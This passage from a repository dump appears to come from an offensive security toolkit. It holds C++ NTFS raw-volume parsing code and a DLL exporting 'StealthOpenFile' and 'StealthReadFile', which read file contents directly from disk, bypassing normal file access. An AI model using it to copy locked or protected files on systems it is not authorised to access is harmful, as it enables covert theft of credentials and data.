: 0;\n}\n\n// Get File Times\nvoid CFileRecord::GetFileTime(FILETIME *writeTm, FILETIME *createTm, FILETIME *accessTm) const\n{\n\t// Standard Information attribute hold the most updated file time\n\tCAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\tif (si)\n\t\tsi->GetFileTime(writeTm, createTm, accessTm);\n\telse\n\t{\n\t\twriteTm->dwHighDateTime = 0;\n\t\twriteTm->dwLowDateTime = 0;\n\t\tif (createTm)\n\t\t{\n\t\t\tcreateTm->dwHighDateTime = 0;\n\t\t\tcreateTm->dwLowDateTime = 0;\n\t\t}\n\t\tif (accessTm)\n\t\t{\n\t\t\taccessTm->dwHighDateTime = 0;\n\t\t\taccessTm->dwLowDateTime = 0;\n\t\t}\n\t}\n}\n\n// Traverse all sub directories and files contained\n// Call user defined callback routine once found an entry\nvoid CFileRecord::TraverseSubEntries(SUBENTRY_CALLBACK seCallBack) const\n{\n\t_ASSERT(seCallBack);\n\n\t// Start traversing from IndexRoot (B+ tree root node)\n\n\tCAttr_IndexRoot* ir = (CAttr_IndexRoot*)FindFirstAttr(ATTR_TYPE_INDEX_ROOT);\n\tif (ir == NULL || !ir->IsFileName())\n\t\treturn;\n\n\tCIndexEntryList *ieList = (CIndexEntryList*)ir;\n\tCIndexEntry *ie = ieList->FindFirstEntry();\n\twhile (ie)\n\t{\n\t\t// Visit subnode first\n\t\tif (ie->IsSubNodePtr())\n\t\t\tTraverseSubNode(ie->GetSubNodeVCN(), seCallBack);\n\n\t\tif (ie->HasName())\n\t\t\tseCallBack(ie);\n\n\t\tie = ieList->FindNextEntry();\n\t}\n}\n\n// Find a specific FileName from InexRoot described B+ tree\n__inline const BOOL CFileRecord::FindSubEntry(const _TCHAR *fileName, CIndexEntry &ieFound) const\n{\n\t// Start searching from IndexRoot (B+ tree root node)\n\tCAttr_IndexRoot *ir = (CAttr_IndexRoot*)FindFirstAttr(ATTR_TYPE_INDEX_ROOT);\n\tif (ir == NULL || !ir->IsFileName())\n\t\treturn FALSE;\n\n\tCIndexEntryList *ieList = (CIndexEntryList*)ir;\n\tCIndexEntry *ie = ieList->FindFirstEntry();\n\twhile (ie)\n\t{\n\t\tif (ie->HasName())\n\t\t{\n\t\t\t// Compare name\n\t\t\tint i = ie->Compare(fileName);\n\t\t\tif (i == 0)\n\t\t\t{\n\t\t\t\tieFound = *ie;\n\t\t\t\treturn TRUE;\n\t\t\t}\n\t\t\telse if (i < 0)\t\t// fileName is smaller than IndexEntry\n\t\t\t{\n\t\t\t\t// Visit SubNode\n\t\t\t\tif (ie->IsSubNodePtr())\n\t\t\t\t{\n\t\t\t\t\t// Search in SubNode (IndexBlock)\n\t\t\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\t\t\treturn TRUE;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t\treturn FALSE;\t// not found\n\t\t\t}\n\t\t\t// Just step forward if fileName is bigger than IndexEntry\n\t\t}\n\t\telse if (ie->IsSubNodePtr())\n\t\t{\n\t\t\t// Search in SubNode (IndexBlock)\n\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\treturn TRUE;\n\t\t}\n\n\t\tie = ieList->FindNextEntry();\n\t}\n\n\treturn FALSE;\n}\n\n// Find Data attribute class of \nconst CAttrBase* CFileRecord::FindStream(_TCHAR *name)\n{\n\tconst CAttrBase *data = FindFirstAttr(ATTR_TYPE_DATA);\n\twhile (data)\n\t{\n\t\tif (data->IsUnNamed() && name == NULL)\t// Unnamed stream\n\t\t\tbreak;\n\t\tif ((!data->IsUnNamed()) && name)\t// Named stream\n\t\t{\n\t\t\t_TCHAR an[MAX_PATH];\n\t\t\tif (data->GetAttrName(an, MAX_PATH))\n\t\t\t{\n\t\t\t\tif (_tcscmp(an, name) == 0)\n\t\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tdata = FindNextAttr(ATTR_TYPE_DATA);\n\t}\n\n\treturn data;\n}\n\n// Check if it's deleted or in use\n__inline BOOL CFileRecord::IsDeleted() const\n{\n\treturn !(FileRecord->Flags & FILE_RECORD_FLAG_INUSE);\n}\n\n// Check if it's a directory\n__inline BOOL CFileRecord::IsDirectory() const\n{\n\treturn FileRecord->Flags & FILE_RECORD_FLAG_DIR;\n}\n\n__inline BOOL CFileRecord::IsReadOnly() const\n{\n\t// Standard Information attribute holds the most updated file time\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsReadOnly() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsHidden() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsHidden() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsSystem() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsSystem() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsCompressed() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsCompressed() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsEncrypted() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsEncrypted() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsSparse() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsSparse() : FALSE;\n}\n\n\n///////////////////////////////////////\n// NTFS Volume Implementation\n///////////////////////////////////////\nCNTFSVolume::CNTFSVolume(_TCHAR volume)\n{\n\thVolume = INVALID_HANDLE_VALUE;\n\tVolumeOK = FALSE;\n\tMFTRecord = NULL;\n\tMFTData = NULL;\n\tVersion = 0;\n\tClearAttrRawCB();\n\n\tif (!OpenVolume(volume))\n\t\treturn;\n\n\t// Verify NTFS volume version (must >= 3.0)\n\n\tCFileRecord vol(this);\n\tvol.SetAttrMask(MASK_VOLUME_NAME | MASK_VOLUME_INFORMATION);\n\tif (!vol.ParseFileRecord(MFT_IDX_VOLUME))\n\t\treturn;\n\n\tvol.ParseAttrs();\n\tCAttr_VolInfo *vi = (CAttr_VolInfo*)vol.FindFirstAttr(ATTR_TYPE_VOLUME_INFORMATION);\n\tif (!vi)\n\t\treturn;\n\n\tVersion = vi->GetVersion();\n\tNTFS_TRACE2(\"NTFS volume version: %u.%u\\n\", HIBYTE(Version), LOBYTE(Version));\n\tif (Version < 0x0300)\t// NT4 ?\n\t\treturn;\n\n#ifdef\t_DEBUG\n\tCAttr_VolName *vn = (CAttr_VolName*)vol.FindFirstAttr(ATTR_TYPE_VOLUME_NAME);\n\tif (vn)\n\t{\n\t\tchar volname[MAX_PATH];\n\t\tif (vn->GetName(volname, MAX_PATH) > 0)\n\t\t{\n\t\t\tNTFS_TRACE1(\"NTFS volume name: %s\\n\", volname);\n\t\t}\n\t}\n#endif\n\n\tVolumeOK = TRUE;\n\n\tMFTRecord = new CFileRecord(this);\n\tMFTRecord->SetAttrMask(MASK_DATA);\n\tif (MFTRecord->ParseFileRecord(MFT_IDX_MFT))\n\t{\n\t\tMFTRecord->ParseAttrs();\n\t\tMFTData = MFTRecord->FindFirstAttr(ATTR_TYPE_DATA);\n\t\tif (MFTData == NULL)\n\t\t{\n\t\t\tdelete MFTRecord;\n\t\t\tMFTRecord = NULL;\n\t\t}\n\t}\n}\n\nCNTFSVolume::~CNTFSVolume()\n{\n\tif (hVolume != INVALID_HANDLE_VALUE)\n\t\tCloseHandle(hVolume);\n\n\tif (MFTRecord)\n\t\tdelete MFTRecord;\n}\n\n// Open a volume ('a' - 'z', 'A' - 'Z'), get volume handle and BPB\nBOOL CNTFSVolume::OpenVolume(_TCHAR volume)\n{\n\t// Verify parameter\n\tif (!_istalpha(volume))\n\t{\n\t\tNTFS_TRACE(\"Volume name error, should be like 'C', 'D'\\n\");\n\t\treturn FALSE;\n\t}\n\n\t_TCHAR volumePath[7];\n\t_sntprintf(volumePath, 6, _T(\"\\\\\\\\.\\\\%c:\"), volume);\n\tvolumePath[6] = _T('\\0');\n\n\thVolume = CreateFile(volumePath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,\n\t\tNULL, OPEN_EXISTING, FILE_ATTRIBUTE_READONLY, NULL);\n\tif (hVolume != INVALID_HANDLE_VALUE)\n\t{\n\t\tDWORD num;\n\t\tNTFS_BPB bpb;\n\n\t\t// Read the first sector (boot sector)\n\t\tif (ReadFile(hVolume, &bpb, 512, &num, NULL) && num==512)\n\t\t{\n\t\t\tif (strncmp((const char*)bpb.Signature, NTFS_SIGNATURE, 8) == 0)\n\t\t\t{\n\t\t\t\t// Log important volume parameters\n\n\t\t\t\tSectorSize = bpb.BytesPerSector;\n\t\t\t\tNTFS_TRACE1(\"Sector Size = %u bytes\\n\", SectorSize);\n\n\t\t\t\tClusterSize = SectorSize * bpb.SectorsPerCluster;\n\t\t\t\tNTFS_TRACE1(\"Cluster Size = %u bytes\\n\", ClusterSize);\n\n\t\t\t\tint sz = (char)bpb.ClustersPerFileRecord;\n\t\t\t\tif (sz > 0)\n\t\t\t\t\tFileRecordSize = ClusterSize * sz;\n\t\t\t\telse\n\t\t\t\t\tFileRecordSize = 1 << (-sz);\n\t\t\t\tNTFS_TRACE1(\"FileRecord Size = %u bytes\\n\", FileRecordSize);\n\n\t\t\t\tsz = (char)bpb.ClustersPerIndexBlock;\n\t\t\t\tif (sz > 0)\n\t\t\t\t\tIndexBlockSize = ClusterSize * sz;\n\t\t\t\telse\n\t\t\t\t\tIndexBlockSize = 1 << (-sz);\n\t\t\t\tNTFS_TRACE1(\"IndexBlock Size = %u bytes\\n\", IndexBlockSize);\n\n\t\t\t\tMFTAddr = bpb.LCN_MFT * ClusterSize;\n\t\t\t\tNTFS_TRACE1(\"MFT address = 0x%016I64X\\n\", MFTAddr);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Volume file system is not NTFS\\n\");\n\t\t\t\tgoto IOError;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Read boot sector error\\n\");\n\t\t\tgoto IOError;\n\t\t}\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE1(\"Cannnot open volume %c\\n\", (char)volume);\nIOError:\n\t\tif (hVolume != INVALID_HANDLE_VALUE)\n\t\t{\n\t\t\tCloseHandle(hVolume);\n\t\t\thVolume = INVALID_HANDLE_VALUE;\n\t\t}\n\t\treturn FALSE;\n\t}\n\n\treturn TRUE;\n}\n\n// Check if Volume is successfully opened\n__inline BOOL CNTFSVolume::IsVolumeOK() const\n{\n\treturn VolumeOK;\n}\n\n// Get NTFS volume version\n__inline WORD CNTFSVolume::GetVersion() const\n{\n\treturn Version;\n}\n\n// Get File Record count\n__inline ULONGLONG CNTFSVolume::GetRecordsCount() const\n{\n\treturn (MFTData->GetDataSize() / FileRecordSize);\n}\n\n// Get BPB information\n\n__inline DWORD CNTFSVolume::GetSectorSize() const\n{\n\treturn SectorSize;\n}\n\n__inline DWORD CNTFSVolume::GetClusterSize() const\n{\n\treturn ClusterSize;\n}\n\n__inline DWORD CNTFSVolume::GetFileRecordSize() const\n{\n\treturn FileRecordSize;\n}\n\n__inline DWORD CNTFSVolume::GetIndexBlockSize() const\n{\n\treturn IndexBlockSize;\n}\n\n// Get MFT starting address\n__inline ULONGLONG CNTFSVolume::GetMFTAddr() const\n{\n\treturn MFTAddr;\n}\n\n// Install Attribute CallBack routines for the whole Volume\nBOOL CNTFSVolume::InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb)\n{\n\tDWORD atIdx = ATTR_INDEX(attrType);\n\tif (atIdx < ATTR_NUMS)\n\t{\n\t\tAttrRawCallBack[atIdx] = cb;\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n// Clear all Attribute CallBack routines\n__inline void CNTFSVolume::ClearAttrRawCB()\n{\n\tfor (int i = 0; i < ATTR_NUMS; i ++)\n\t\tAttrRawCallBack[i] = NULL;\n}\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/ReadMe.txt",
    "content": "========================================================================\n    CONSOLE APPLICATION : NTFSParser Project Overview\n========================================================================\n\nAppWizard has created this NTFSParser application for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your NTFSParser application.\n\n\nNTFSParser.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nNTFSParser.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nNTFSParser.cpp\n    This is the main application source file.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named NTFSParser.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// NTFSParser.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#include <stdio.h>\n#include <tchar.h>\n#include <iostream>\n#include <string>\n#include <fstream>\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 2012\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"NTFSParserDLL\", \"NTFSParserDLL\\NTFSParserDLL.vcxproj\", \"{5E42B778-F231-4797-B7FD-7D5BCA9738D0}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Win32 = Release|Win32\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64\n\t\t{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h",
    "content": "/*\n * NTFS include files\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef __NTFS_H_CYB70289\n#define\t__NTFS_H_CYB70289\n\n#pragma pack(8)\n\n#include \"NTFS_Common.h\"\n#include \"NTFS_FileRecord.h\"\n#include \"NTFS_Attribute.h\"\n\n#pragma pack()\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp",
    "content": "/*\n * \n * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n//\n// This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>\n\n#include \"stdafx.h\"\n#include \"NTFS.h\"\n#include \"NTFS_DataType.h\"\n\nusing namespace std;\n\nstruct FileInfo_t\n{\n\tCNTFSVolume* volume;\n\tCFileRecord* fileRecord;\n\tCIndexEntry* indexEntry;\n\tCAttrBase* data;\n};\n\nextern \"C\" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr)\n{\n\tFileInfo_t* fileInfo = new FileInfo_t;\n\n\tstring filePath = string(filePathCStr);\n\t_TCHAR volumeName = filePath.at(0);\n\n\tfileInfo->volume = new CNTFSVolume(volumeName);\n\tif (!fileInfo->volume->IsVolumeOK())\n\t{\n\t\treturn NULL;\n\t}\n\n\t//Parse root directory\n\tfileInfo->fileRecord = new CFileRecord(fileInfo->volume);\n\tfileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION);\n\n\tif (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT))\n\t{\n\t\treturn NULL;\n\t}\n\tif (!fileInfo->fileRecord->ParseAttrs())\n\t{\n\t\treturn NULL;\n\t}\n\n\t//Find subdirectory\n\tfileInfo->indexEntry = new CIndexEntry;\n\tint dirs = filePath.find(_T('\\\\'), 0);\n\tint dire = filePath.find(_T('\\\\'), dirs+1);\n\n\twhile (dire != string::npos)\n\t{\n\t\tstring pathname = filePath.substr(dirs+1, dire-dirs-1);\n\t\tconst _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str();\n\t\tif (fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry)))\n\t\t{\n\t\t\tif (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))\n\t\t\t{\n\t\t\t\treturn NULL;\n\t\t\t}\n\n\t\t\tif (!fileInfo->fileRecord->ParseAttrs())\n\t\t\t{\n\t\t\t\tif (fileInfo->fileRecord->IsCompressed())\n\t\t\t\t{\n\t\t\t\t\treturn NULL;\n\t\t\t\t}\n\t\t\t\telse if (fileInfo->fileRecord->IsEncrypted())\n\t\t\t\t{\n\t\t\t\t\treturn NULL;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\treturn NULL;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\treturn NULL;\n\t\t}\n\n\n\t\tdirs = dire;\n\t\tdire = filePath.find(_T('\\\\'), dirs+1);\n\t}\n\n\tstring fileName = filePath.substr(dirs+1, filePath.size()-1);\n\tconst _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str();\n\tif (fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry)))\n\t{\n\t\tif (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))\n\t\t{\n\t\t\treturn NULL;\n\t\t}\n\n\t\tfileInfo->fileRecord->SetAttrMask(MASK_DATA);\n\t\tif (!fileInfo->fileRecord->ParseAttrs())\n\t\t{\n\t\t\treturn NULL;\n\t\t}\n\n\t\t fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream();\n\n\t\t return fileInfo;\n\t}\n\n\treturn NULL;\n}\n\n\nextern \"C\" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining)\n{\n\n\tif (fileInfo->data)\n\t{\n\t\tULONGLONG dataLength = (ULONGLONG)fileInfo->data->GetDataSize();\n\t\tULONGLONG fullDataLength = dataLength;\n\n\t\tdataLength = dataLength - offset;\n\t\tif (dataLength > bufferSize)\n\t\t{\n\t\t\tdataLength = bufferSize;\n\t\t}\n\t\tif (dataLength > MAXUINT32)\n\t\t{\n\t\t\treturn 1;\n\t\t}\n\n\t\tDWORD len;\n\t\tif (fileInfo->data->ReadData(offset, buffer, dataLength, &len) && len == dataLength)\n\t\t{\n\t\t\t*bytesRead = len;\n\t\t\t*dataRemaining = fullDataLength - len - offset;\n\t\t\treturn 0; //Success\n\t\t}\n\t\treturn 3;\n\t}\n\treturn 2;\n}\n\n\nextern \"C\" void __declspec(dllexport) StealthCloseFile(FileInfo_t* fileInfo)\n{\n\tdelete (fileInfo->data);\n\tdelete (fileInfo->indexEntry);\n\tdelete (fileInfo->volume);\n\tdelete fileInfo;\n}\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{5E42B778-F231-4797-B7FD-7D5BCA9738D0}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>NTFSParserDLL</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>NotSet</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>NotSet</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110_xp</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>NotSet</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110_xp</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>NotSet</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup 